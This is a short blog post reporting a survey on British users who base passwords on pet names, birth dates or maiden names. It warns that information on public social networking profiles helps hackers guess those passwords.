According to a survey on the people search website www.yasni.co.uk, 83 percent of British users responding to the survey use their dog’s name, or their own date of birth or maiden name as a password on private email accounts, or even worse, to log onto online banking.

What’s even more surprising is that only 37 percent said they were aware that disclosing this type of information online could be dangerous. Just browse through Facebook or MySpace–see how many phone numbers you find. Way too many. Some people even go so far as to put their personal street addresses. Social networking pages are a treasure trove of personal information, much of which can be used to guess passwords. And so, we add another rule to the password Bible: Never use as a password anything that can be found on your MySpace page. Sixty percent never considered the dangers of putting this information online, and so it’s time to send out the memo and let everybody in the company know.

Although social networking sites typically have the ability to let people change profiles to a “private” setting, the “public” setting is the default, and many users won’t bother changing it, or don’t realize that they can. The danger is clear: Social networking profiles may be mistakenly left public, and hackers can mine those profiles for information for password guessing.

Are you giving away your password?

Free ebook download: Top 10 Most Popular Troubleshooting Posts for Email Administrators